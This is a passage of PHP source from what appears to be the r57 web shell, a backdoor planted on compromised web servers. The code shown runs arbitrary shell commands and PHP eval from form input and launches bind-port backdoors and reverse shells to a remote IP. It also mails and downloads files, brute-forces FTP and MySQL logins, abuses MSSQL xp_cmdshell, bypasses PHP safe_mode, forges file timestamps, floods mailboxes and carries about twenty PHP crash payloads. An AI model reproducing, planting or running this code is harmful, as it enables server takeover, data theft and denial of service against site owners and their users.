echo ws(2) . $lb . " <a href=''PHP_SELF'] . "?df title=\"View df -h\"><b>df -h</b></a> " . $rb;
}
echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000>
<tr><td align=right width=100>';
echo $font;
if ($unix) {
echo '<font color=blue><b>uname -a :' . ws(1) . '<br>sysctl :' . ws(1) . '<br>$OSTYPE :' . ws(1) . '<br>Server :' . ws(1) . '<br>id :' . ws(1) . '<br>pwd :' . ws(1) . '</b></font><br>';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo ((!empty($uname)) ? (ws(3) . @substr($uname, 0, 120) . "<br>") : (ws(3) . @substr(@php_uname(), 0, 120) . "<br>"));
echo ws(3) . $sysctl . "<br>";
echo ws(3) . ex('echo $OSTYPE') . "<br>";
echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>";
if (!empty($id)) {
echo ws(3) . $id . "<br>";
} else if (@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid')) {
$euserinfo = @posix_getpwuid(@posix_geteuid());
$egroupinfo = @posix_getgrgid(@posix_getegid());
echo ws(3) . 'uid=' . $euserinfo['uid'] . ' ( ' . $euserinfo['name'] . ' ) gid=' . $egroupinfo['gid'] . ' ( ' . $egroupinfo['name'] . ' )<br>';
} else echo ws(3) . "user=" . @get_current_user() . " uid=" . @getmyuid() . " gid=" . @getmygid() . "<br>";
echo ws(3) . $dir;
echo ws(3) . '( ' . perms(@fileperms($dir)) . ' )';
echo "</b></font>";
} else {
echo '<font color=blue><b>OS :' . ws(1) . '<br>Server :' . ws(1) . '<br>User :' . ws(1) . '<br>pwd :' . ws(1) . '</b></font><br>';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo ws(3) . @substr(@php_uname(), 0, 120) . "<br>";
echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>";
echo ws(3) . @getenv("USERNAME") . "<br>";
echo ws(3) . $dir;
echo "<br></font>";
}
echo "</font>";
echo "</td></tr></table>";
if (!empty($_POST['cmd']) && $_POST['cmd'] == "mail") {
$res = mail($_POST['to'], $_POST['subj'], $_POST['text'], "From: " . $_POST['from'] . "\r\n");
err(6 + $res);
$_POST['cmd'] = "";
}
if (!empty($_POST['cmd']) && $_POST['cmd'] == "mail_file" && !empty($_POST['loc_file'])) {
if ($file = @fopen($_POST['loc_file'], "r")) {
$filedump = @fread($file, @filesize($_POST['loc_file']));
@fclose($file);
} else if ($file = readzlib($_POST['loc_file'])) {
$filedump = $file;
} else {
err(1, $_POST['loc_file']);
$_POST['cmd'] = "";
}
if (isset($_POST['cmd'])) {
$filename = @basename($_POST['loc_file']);
$content_encoding = $mime_type = '';
compress($filename, $filedump, $_POST['compress']);
$attach = array("name" => $filename, "type" => $mime_type, "content" => $filedump);
if (empty($_POST['subj'])) {
$_POST['subj'] = 'file from r57';
}
if (empty($_POST['from'])) {
$_POST['from'] = 'billy@microsoft.com';
}
$res = mailattach($_POST['to'], $_POST['from'], $_POST['subj'], $attach);
err(6 + $res);
$_POST['cmd'] = "";
}
}
if (!empty($_POST['cmd']) && $_POST['cmd'] == "mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size'])) {
for ($h = 1;$h <= $_POST['mail_flood'];$h++) {
$res = mail($_POST['to'], $_POST['subj'], $_POST['text'] . str_repeat(" ", 1024 * $_POST['mail_size']), "From: " . $_POST['from'] . "\r\n");
}
err(6 + $res);
$_POST['cmd'] = "";
}
if (!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") {
$_POST['cmd'] = 'find ' . $_POST['s_dir'] . ' -name \'' . $_POST['s_mask'] . '\' | xargs grep -E \'' . $_POST['s_text'] . '\'';
}
if (!empty($_POST['cmd']) && $_POST['cmd'] == "ch_") {
switch ($_POST['what']) {
case 'own':
@chown($_POST['param1'], $_POST['param2']);
break;
case 'grp':
@chgrp($_POST['param1'], $_POST['param2']);
break;
case 'mod':
@chmod($_POST['param1'], intval($_POST['param2'], 8));
break;
}
$_POST['cmd'] = "";
}
if (!empty($_POST['cmd']) && $_POST['cmd'] == "mk") {
switch ($_POST['what']) {
case 'file':
if ($_POST['action'] == "create") {
if (@file_exists($_POST['mk_name']) || !$file = @fopen($_POST['mk_name'], "w")) {
err(2, $_POST['mk_name']);
$_POST['cmd'] = "";
} else {
@fclose($file);
$_POST['e_name'] = $_POST['mk_name'];
$_POST['cmd'] = "edit_file";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>" . $lang[$language . '_text61'] . "</b></font></div></td></tr></table>";
}
} else if ($_POST['action'] == "delete") {
if (unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>" . $lang[$language . '_text63'] . "</b></font></div></td></tr></table>";
$_POST['cmd'] = "";
}
break;
case 'dir':
if ($_POST['action'] == "create") {
if (@mkdir($_POST['mk_name'])) {
$_POST['cmd'] = "";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>" . $lang[$language . '_text62'] . "</b></font></div></td></tr></table>";
} else {
err(2, $_POST['mk_name']);
$_POST['cmd'] = "";
}
} else if ($_POST['action'] == "delete") {
if (@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>" . $lang[$language . '_text64'] . "</b></font></div></td></tr></table>";
$_POST['cmd'] = "";
}
break;
}
}
if (!empty($_POST['cmd']) && $_POST['cmd'] == "touch") {
if (!$_POST['file_name_r']) {
$datar = $_POST['day'] . " " . $_POST['month'] . " " . $_POST['year'] . " " . $_POST['chasi'] . " hours " . $_POST['minutes'] . " minutes " . $_POST['second'] . " seconds";
$datar = @strtotime($datar);
@touch($_POST['file_name'], $datar, $datar);
} else {
@touch($_POST['file_name'], @filemtime($_POST['file_name_r']), @filemtime($_POST['file_name_r']));
}
$_POST['cmd'] = "";
}
if (!empty($_POST['cmd']) && $_POST['cmd'] == "edit_file" && !empty($_POST['e_name'])) {
if (!$file = @fopen($_POST['e_name'], "r+")) {
$filedump = @fread($file, @filesize($_POST['e_name']));
@fclose($file);
$only_read = 1;
}
if ($file = @fopen($_POST['e_name'], "r")) {
$filedump = @fread($file, @filesize($_POST['e_name']));
@fclose($file);
} else if ($file = readzlib($_POST['e_name'])) {
$filedump = $file;
$only_read = 1;
} else {
err(1, $_POST['e_name']);
$_POST['cmd'] = "";
}
if (isset($_POST['cmd'])) {
echo $table_up3;
echo $font;
echo "<form name=save_file method=post>";
echo ws(3) . "<b>" . $_POST['e_name'] . "</b>";
echo "<div align=center><textarea name=e_text cols=121 rows=24>";
echo @htmlspecialchars($filedump);
echo "</textarea>";
echo "<input type=hidden name=e_name value=" . $_POST['e_name'] . ">";
echo "<input type=hidden name=dir value=" . $dir . ">";
echo "<input type=hidden name=cmd value=save_file>";
echo (!empty($only_read) ? ("<br><br>" . $lang[$language . '_text44']) : ("<br><br><input type=submit name=submit value=\" " . $lang[$language . '_butt10'] . " \">"));
echo "</div>";
echo "</font>";
echo "</form>";
echo "</td></tr></table>";
exit();
}
}
if (!empty($_POST['cmd']) && $_POST['cmd'] == "save_file") {
$mtime = @filemtime($_POST['e_name']);
if ((!$file = @fopen($_POST['e_name'], "w")) && (!function_exists('file_put_contents'))) {
err(0, $_POST['e_name']);
} else {
if ($unix) $_POST['e_text'] = @str_replace("\r\n", "\n", $_POST['e_text']);
@fwrite($file, $_POST['e_text']) or @fputs($file, $_POST['e_text']) or @file_put_contents($_POST['e_name'], $_POST['e_text']);
@touch($_POST['e_name'], $mtime, $mtime);
$_POST['cmd'] = "";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>" . $lang[$language . '_text45'] . "</b></font></div></td></tr></table>";
}
}
if (!empty($_POST['proxy_port']) && ($_POST['use'] == "Perl")) {
cf("/tmp/prxpl", $prx_pl);
$p2 = which("perl");
$blah = ex($p2 . " /tmp/prxpl " . $_POST['proxy_port'] . " &");
$_POST['cmd'] = "ps -aux | grep prxpl";
}
if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == "C")) {
cf("/tmp/bd.c", $port_bind_bd_c);
$blah = ex("gcc -o /tmp/bd /tmp/bd.c");
@unlink("/tmp/bd.c");
$blah = ex("/tmp/bd " . $_POST['port'] . " " . $_POST['bind_pass'] . " &");
$_POST['cmd'] = "ps -aux | grep bd";
}
if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == "Perl")) {
cf("/tmp/bdpl", $port_bind_bd_pl);
$p2 = which("perl");
$blah = ex($p2 . " /tmp/bdpl " . $_POST['port'] . " &");
$_POST['cmd'] = "ps -aux | grep bdpl";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use'] == "Perl")) {
cf("/tmp/back", $back_connect);
$p2 = which("perl");
$blah = ex($p2 . " /tmp/back " . $_POST['ip'] . " " . $_POST['port'] . " &");
$_POST['cmd'] = "echo \"Now script try connect to " . $_POST['ip'] . " port " . $_POST['port'] . " ...\"";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use'] == "C")) {
cf("/tmp/back.c", $back_connect_c);
$blah = ex("gcc -o /tmp/backc /tmp/back.c");
@unlink("/tmp/back.c");
$blah = ex("/tmp/backc " . $_POST['ip'] . " " . $_POST['port'] . " &");
$_POST['cmd'] = "echo \"Now script try connect to " . $_POST['ip'] . " port " . $_POST['port'] . " ...\"";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use'] == "Perl")) {
cf("/tmp/dp", $datapipe_pl);
$p2 = which("perl");
$blah = ex($p2 . " /tmp/dp " . $_POST['local_port'] . " " . $_POST['remote_host'] . " " . $_POST['remote_port'] . " &");
$_POST['cmd'] = "ps -aux | grep dp";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use'] == "C")) {
cf("/tmp/dpc.c", $datapipe_c);
$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
@unlink("/tmp/dpc.c");
$blah = ex("/tmp/dpc " . $_POST['local_port'] . " " . $_POST['remote_port'] . " " . $_POST['remote_host'] . " &");
$_POST['cmd'] = "ps -aux | grep dpc";
}
if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) {
$_POST['cmd'] = $aliases[$_POST['alias']];
}
for ($upl = 0;$upl <= 16;$upl++) {
if (!empty($HTTP_POST_FILES['userfile' . $upl]['name'])) {
if (!empty($_POST['new_name']) && ($upl == 0)) {
$nfn = $_POST['new_name'];
} else {
$nfn = $HTTP_POST_FILES['userfile' . $upl]['name'];
}
@move_uploaded_file($HTTP_POST_FILES['userfile' . $upl]['tmp_name'], $_POST['dir'] . "/" . $nfn) or print ("<font color=red face=Fixedsys><div align=center>Error uploading file " . $HTTP_POST_FILES['userfile' . $upl]['name'] . "</div></font>");
}
}
if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) {
switch ($_POST['with']) {
case 'fopen':
$datafile = @implode("", @file($_POST['rem_file']));
if ($datafile) {
$w_file = @fopen($_POST['loc_file'], "wb") or @function_exists('file_put_contents') or err(0);
if ($w_file) {
@fwrite($w_file, $datafile) or @fputs($w_file, $datafile) or @file_put_contents($_POST['loc_file'], $datafile);
@fclose($w_file);
}
}
$_POST['cmd'] = '';
break;
case 'wget':
$_POST['cmd'] = which('wget') . " " . $_POST['rem_file'] . " -O " . $_POST['loc_file'] . "";
break;
case 'fetch':
$_POST['cmd'] = which('fetch') . " -o " . $_POST['loc_file'] . " -p " . $_POST['rem_file'] . "";
break;
case 'lynx':
$_POST['cmd'] = which('lynx') . " -source " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . "";
break;
case 'links':
$_POST['cmd'] = which('links') . " -source " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . "";
break;
case 'GET':
$_POST['cmd'] = which('GET') . " " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . "";
break;
case 'curl':
$_POST['cmd'] = which('curl') . " " . $_POST['rem_file'] . " -o " . $_POST['loc_file'] . "";
break;
}
}
if (!empty($_POST['cmd']) && (($_POST['cmd'] == "ftp_file_up") || ($_POST['cmd'] == "ftp_file_down"))) {
list($ftp_server, $ftp_port) = split(":", $_POST['ftp_server_port']);
if (empty($ftp_port)) {
$ftp_port = 21;
}
$connection = @ftp_connect($ftp_server, $ftp_port, 10);
if (!$connection) {
err(3);
} else {
if (!@ftp_login($connection, $_POST['ftp_login'], $_POST['ftp_password'])) {
err(4);
} else {
if ($_POST['cmd'] == "ftp_file_down") {
if (chop($_POST['loc_file']) == $dir) {
$_POST['loc_file'] = $dir . ((!$unix) ? ('\\') : ('/')) . basename($_POST['ftp_file']);
}
@ftp_get($connection, $_POST['loc_file'], $_POST['ftp_file'], $_POST['mode']);
}
if ($_POST['cmd'] == "ftp_file_up") {
@ftp_put($connection, $_POST['ftp_file'], $_POST['loc_file'], $_POST['mode']);
}
}
}
@ftp_close($connection);
$_POST['cmd'] = "";
}
if (!empty($_POST['cmd']) && (($_POST['cmd'] == "ftp_brute") || ($_POST['cmd'] == "db_brute"))) {
if ($_POST['cmd'] == "ftp_brute") {
list($ftp_server, $ftp_port) = split(":", $_POST['ftp_server_port']);
if (empty($ftp_port)) {
$ftp_port = 21;
}
$connection = @ftp_connect($ftp_server, $ftp_port, 10);
} else if ($_POST['cmd'] == "db_brute") {
$connection = 1;
}
if (!$connection) {
err(3);
$_POST['cmd'] = "";
} else if (($_POST['brute_method'] == 'passwd') && (!$users = get_users('/etc/passwd'))) {
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>" . $lang[$language . '_text96'] . "</b></div></font></td></tr></table>";
$_POST['cmd'] = "";
} else if (($_POST['brute_method'] == 'dic') && (!$users = get_users($_POST['dictionary']))) {
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>";
$_POST['cmd'] = "";
}
if ($_POST['cmd'] == "ftp_brute") {
@ftp_close($connection);
}
}
echo $table_up3;
if (empty($_POST['cmd']) && !$safe_mode && !$open_basedir) {
$_POST['cmd'] = (!$unix) ? ("dir") : ("ls -lia");
} else if (empty($_POST['cmd']) && ($safe_mode || $open_basedir)) {
$_POST['cmd'] = "safe_dir";
}
echo $font . $lang[$language . '_text1'] . ": <b>" . $_POST['cmd'] . "</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
if ($safe_mode || $open_basedir) {
switch ($_POST['cmd']) {
case 'safe_dir':
$d = @dir($dir);
if ($d) {
while (false !== ($file = $d->read())) {
if ($file == "." || $file == "..") continue;
@clearstatcache();
@list($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
if (!$unix) {
echo date("d.m.Y H:i", $mtime);
if (@is_dir($file)) echo " <DIR> ";
else printf("% 7s ", $size);
} else {
if (@function_exists('posix_getpwuid')) {
$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
} else {
$owner['name'] = $grgid['name'] = '';
}
echo $inode . " ";
echo perms(@fileperms($file));
@printf("% 4d % 9s % 9s %7s ", $nlink, $owner['name'], $grgid['name'], $size);
echo date("d.m.Y H:i ", $mtime);
}
echo "$file\n";
}
$d->close();
} else if (@function_exists('glob')) {
function eh($errno, $errstr, $errfile, $errline) {
global $D, $c, $i;
preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
if ($o) {
$D[$c] = $o[2];
$c++;
}
}
$error_reporting = @ini_get('error_reporting');
error_reporting(E_WARNING);
@ini_set("display_errors", 1);
$root = "/";
if ($dir) $root = $dir;
$c = 0;
$D = array();
@set_error_handler("eh");
$chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
for ($i = 0;$i < strlen($chars);$i++) {
$path = "{$root}" . ((substr($root, -1) != "/") ? "/" : NULL) . "{$chars[$i]}";
$prevD = $D[count($D) - 1];
@glob($path . "*");
if ($D[count($D) - 1] != $prevD) {
for ($j = 0;$j < strlen($chars);$j++) {
$path = "{$root}" . ((substr($root, -1) != "/") ? "/" : NULL) . "{$chars[$i]}{$chars[$j]}";
$prevD2 = $D[count($D) - 1];
@glob($path . "*");
if ($D[count($D) - 1] != $prevD2) {
for ($p = 0;$p < strlen($chars);$p++) {
$path = "{$root}" . ((substr($root, -1) != "/") ? "/" : NULL) . "{$chars[$i]}{$chars[$j]}{$chars[$p]}";
$prevD3 = $D[count($D) - 1];
@glob($path . "*");
if ($D[count($D) - 1] != $prevD3) {
for ($r = 0;$r < strlen($chars);$r++) {
$path = "{$root}" . ((substr($root, -1) != "/") ? "/" : NULL) . "{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
@glob($path . "*");
}
}
}
}
}
}
}
$D = array_unique($D);
foreach ($D as $item) echo htmlspecialchars("{$item}") . "\r\n";
error_reporting($error_reporting);
} else echo $lang[$language . '_text29'];
break;
case 'test1':
$ci = @curl_init("file://" . $_POST['test1_file']);
$cf = @curl_exec($ci);
echo htmlspecialchars($cf);
break;
case 'test2':
@include ($_POST['test2_file']);
break;
case 'test3':
if (empty($_POST['test3_port'])) {
$_POST['test3_port'] = "3306";
}
$db = @mysql_connect('localhost:' . $_POST['test3_port'], $_POST['test3_ml'], $_POST['test3_mp']);
if ($db) {
if (@mysql_select_db($_POST['test3_md'], $db)) {
@mysql_query("DROP TABLE IF EXISTS temp_r57_table");
@mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
@mysql_query("LOAD DATA INFILE \"" . $_POST['test3_file'] . "\" INTO TABLE temp_r57_table");
$r = @mysql_query("SELECT * FROM temp_r57_table");
while (($r_sql = @mysql_fetch_array($r))) {
echo @htmlspecialchars($r_sql[0]) . "\r\n";
}
@mysql_query("DROP TABLE IF EXISTS temp_r57_table");
} else echo "[-] ERROR! Can't select database";
@mysql_close($db);
} else echo "[-] ERROR! Can't connect to mysql server";
break;
case 'test4':
if (empty($_POST['test4_port'])) {
$_POST['test4_port'] = "1433";
}
$db = @mssql_connect('localhost,' . $_POST['test4_port'], $_POST['test4_ml'], $_POST['test4_mp']);
if ($db) {
if (@mssql_select_db($_POST['test4_md'], $db)) {
@mssql_query("drop table r57_temp_table", $db);
@mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)", $db);
@mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '" . $_POST['test4_file'] . "'", $db);
$res = mssql_query("select * from r57_temp_table", $db);
while (($row = @mssql_fetch_row($res))) {
echo htmlspecialchars($row[0]) . "\r\n";
}
@mssql_query("drop table r57_temp_table", $db);
} else echo "[-] ERROR! Can't select database";
@mssql_close($db);
} else echo "[-] ERROR! Can't connect to MSSQL server";
break;
case 'test5':
$temp = tempnam($dir, "fname");
if (@file_exists($temp)) @unlink($temp);
$extra = "-C " . $_POST['test5_file'] . " -X $temp";
@mb_send_mail(NULL, NULL, NULL, NULL, $extra);
$str = moreread($temp);
echo htmlspecialchars($str);
@unlink($temp);
break;
case 'test6':
$stream = @imap_open('/etc/passwd', "", "");
$dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
for ($i = 0;$i < count($dir_list);$i++) echo htmlspecialchars($dir_list[$i]) . "\r\n";
@imap_close($stream);
break;
case 'test7':
$stream = @imap_open($_POST['test7_file'], "", "");
$str = @imap_body($stream, 1);
echo htmlspecialchars($str);
@imap_close($stream);
break;
case 'test8':
$temp = @tempnam($_POST['test8_file2'], "copytemp");
$str = readzlib($_POST['test8_file1'], $temp);
echo htmlspecialchars($str);
@unlink($temp);
break;
case 'test9':
@ini_restore("safe_mode");
@ini_restore("open_basedir");
$str = moreread($_POST['test9_file']);
echo htmlspecialchars($str);
break;
case 'test10':
@ob_clean();
$error_reporting = @ini_get('error_reporting');
error_reporting(E_ALL ^ E_NOTICE);
@ini_set("display_errors", 1);
$str = fopen($_POST['test10_file'], "r");
while (!feof($str)) {
print htmlspecialchars(fgets($str));
}
fclose($str);
error_reporting($error_reporting);
break;
case 'test11':
@ob_clean();
$temp = 'zip://' . $_POST['test11_file'];
$str = moreread($temp);
echo htmlspecialchars($str);
break;
case 'test12':
@ob_clean();
$temp = 'compress.bzip2://' . $_POST['test12_file'];
$str = moreread($temp);
echo htmlspecialchars($str);
break;
case 'test13':
@error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../" . $_POST['test13_file2']);
echo $lang[$language . '_text61'];
break;
case 'test14':
@session_save_path($_POST['test14_file2'] . "\0;/tmp");
@session_start();
@$_SESSION[php] = $_POST['test14_file1'];
echo $lang[$language . '_text61'];
break;
case 'test15':
@readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../" . $_POST['test15_file2']);
echo $lang[$language . '_text61'];
break;
case 'test16':
if (fopen('srpath://../../../../../../../../../../../' . $_POST['test16_file'], "a")) echo $lang[$language . '_text61'];
break;
case 'test17_1':
@unlink('symlinkread');
@symlink('a/a/a/a/a/a/', 'dummy');
@symlink('dummy/../../../../../../../../../../../' . $_POST['test17_file'], 'symlinkread');
@unlink('dummy');
while (1) {
@symlink('.', 'dummy');
@unlink('dummy');
}
break;
case 'test17_2':
$str = '';
while (strlen($str) < 3) {
$temp = 'symlinkread';
$str = moreread($temp);
if ($str) {
@ob_clean();
echo htmlspecialchars($str);
}
}
break;
case 'test17_3':
$dir = $files = array();
if (@version_compare(@phpversion(), "5.0.0") >= 0) {
while (@count($dir) < 3) {
$dir = @scandir('symlinkread');
if (@count($dir) > 2) {
@ob_clean();
@print_r($dir);
}
}
} else {
while (@count($files) < 3) {
$dh = @opendir('symlinkread');
while (false !== ($filename = @readdir($dh))) {
$files[] = $filename;
}
if (@count($files) > 2) {
@ob_clean();
@print_r($files);
}
}
}
break;
}
}
if ((!$safe_mode) && ($_POST['cmd'] != "php_eval") && ($_POST['cmd'] != "mysql_dump") && ($_POST['cmd'] != "db_query") && ($_POST['cmd'] != "ftp_brute") && ($_POST['cmd'] != "db_brute")) {
$cmd_rep = ex($_POST['cmd']);
if (!$unix) {
echo @htmlspecialchars(@convert_cyr_string($cmd_rep, 'd', 'w')) . "\n";
} else {
echo @htmlspecialchars($cmd_rep) . "\n";
}
}
switch ($_POST['cmd']) {
case 'dos1':
function a() {
a();
}
a();
break;
case 'dos2':
@pack("d4294967297", 2);
break;
case 'dos3':
$a = "a";
@unserialize(@str_replace('1', 2147483647, @serialize($a)));
break;
case 'dos4':
$t = array(1);
while (1) {
$a[] = & $t;
};
break;
case 'dos5':
@dl("sqlite.so");
$db = new SqliteDatabase("foo");
break;
case 'dos6':
preg_match('/(.(?!b))*/', @str_repeat("a", 10000));
break;
case 'dos7':
@str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538));
break;
case 'dos8':
@shell_exec("killall -11 httpd");
break;
case 'dos9':
function cx() {
@tempnam("/www/", "../../../../../../var/tmp/cx");
cx();
}
cx();
break;
case 'dos10':
$a = @str_repeat("A", 438013);
$b = @str_repeat("B", 951140);
@wordwrap($a, 0, $b, 0);
break;
case 'dos11':
@array_fill(1, 123456789, "Infigo-IS");
break;
case 'dos12':
@substr_compare("A", "A", 12345678);
break;
case 'dos13':
@unserialize("a:2147483649:{");
break;
case 'dos14':
$Data = @str_ireplace("\n", "<br>", $Data);
break;
case 'dos15':
function toUTF($x) {
return chr(($x >> 6) + 192) . chr(($x & 63) + 128);
}
$str1 = "";
for ($i = 0;$i < 64;$i++) {
$str1.= toUTF(977);
}
@htmlentities($str1, ENT_NOQUOTES, "UTF-8");
break;
case 'dos16':
$r = @zip_open("x.zip");
$e = @zip_read($r);
$x = @zip_entry_open($r, $e);
for ($i = 0;$i < 1000;$i++) $arr[$i] = array(array(""));
unset($arr[600]);
@zip_entry_read($e, -1);
unset($arr[601]);
break;
case 'dos17':
$z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";
$y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
$x = "AQ ";
unset($z);
unset($y);
$x = base64_decode($x);
$y = @sqlite_udf_decode_binary($x);
unset($x);
break;
case 'dos18':
$MSGKEY = 519052;
$msg_id = @msg_get_queue($MSGKEY, 0600);
if (!@msg_send($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err)) echo "Msg not sent because $msg_err\n";
if (@msg_receive($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) {
echo "$msg\n";
} else {
echo "Received $msg_error fetching message\n";
break;
}
@msg_remove_queue($msg_id);
break;
case 'dos19':
$url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd";
@fopen($url, "r");
break;
case 'dos20':
$hashtable = str_repeat("A", 39);
$hashtable[5 * 4 + 0] = chr(0x58);
$hashtable[5 * 4 + 1] = chr(0x40);
$hashtable[5 * 4 + 2] = chr(0x06);
$hashtable[5 * 4 + 3] = chr(0x08);
$hashtable[8 * 4 + 0] = chr(0x66);
$hashtable[8 * 4 + 1] = chr(0x77);
$hashtable[8 * 4 + 2] = chr(0x88);
$hashtable[8 * 4 + 3] = chr(0x99);
$str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
for ($i = 0;$i < 65535;$i++) {
$str.= 'i:0;R:2;';
}
$str.= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"' . $hashtable . '";i:0;R:3;';
@unserialize($str);
break;
}
if ($_POST['cmd'] == "php_eval") {
$eval = @str_replace("<?", "", $_POST['php_eval']);
$eval = @str_replace("?>", "", $eval);
eval($eval);
}
if ($_POST['cmd'] == "ftp_brute") {
$suc = 0;
if ($_POST['brute_method'] == 'passwd') {
foreach ($users as $user) {
$connection = @ftp_connect($ftp_server, $ftp_port, 10);
if (@ftp_login($connection, $user, $user)) {
echo "[+] $user:$user - success\r\n";
$suc++;
} else if (isset($_POST['reverse'])) {
if (@ftp_login($connection, $user, strrev($user))) {
echo "[+] $user:" . strrev($user) . " - success\r\n";
$suc++;
}
}
@ftp_close($connection);
}
} else if (($_POST['brute_method'] == 'dic') && isset($_POST['ftp_login'])) {
foreach ($users as $user) {
$connection = @ftp_connect($ftp_server, $ftp_port, 10);
if (@ftp_login($connection, $_POST['ftp_login'], $user)) {
echo "[+] " . $_POST['ftp_login'] . ":$user - success\r\n";
$suc++;
}
@ftp_close($connection);
}
}
echo "\r\n-------------------------------------\r\n";
$count = count($users);
if (isset($_POST['reverse']) && ($_POST['brute_method'] == 'passwd')) {
$count*= 2;
}
echo $lang[$language . '_text97'] . $count . "\r\n";
echo $lang[$language . '_text98'] . $suc . "\r\n";
}
if ($_POST['cmd'] == "db_brute") {
$suc = 0;
if ($_POST['brute_method'] == 'passwd') {
foreach ($users as $user) {
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $user;
$sql->pass = $user;
if ($sql->connect()) {
echo "[+] $user:$user - success\r\n";
$suc++;
}
}
if (isset($_POST['reverse'])) {
foreach ($users as $user) {
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $user;
$sql->pass = strrev($user);
if ($sql->connect()) {
echo "[+] $user:" . strrev($user) . " - success\r\n";
$suc++;
}
}
}
} else if (($_POST['brute_method'] == 'dic') && isset($_POST['mysql_l'])) {
foreach ($users as $user) {
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $user;
if ($sql->connect()) {
echo "[+] " . $_POST['mysql_l'] . ":$user - success\r\n";
$suc++;
}
}
}
echo "\r\n-------------------------------------\r\n";
$count = count($users);
if (isset($_POST['reverse']) && ($_POST['brute_method'] == 'passwd')) {
$count*= 2;
}
echo $lang[$language . '_text97'] . $count . "\r\n";
echo $lang[$language . '_text98'] . $suc . "\r\n";
}
if ($_POST['cmd'] == "mysql_dump") {
if (isset($_POST['dif'])) {
$fp = @fopen($_POST['dif_name'], "w");
}
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
if (!$sql->connect()) {
echo "[-] ERROR! Can't connect to SQL server";
} else if (!$sql->select_db()) {
echo "[-] ERROR! Can't select database";
} else if (!$sql->dump($_POST['mysql_tbl'])) {
echo "[-] ERROR! Can't create dump";
} else {
if (empty($_POST['dif'])) {
foreach ($sql->dump as $v) echo $v . "\r\n";
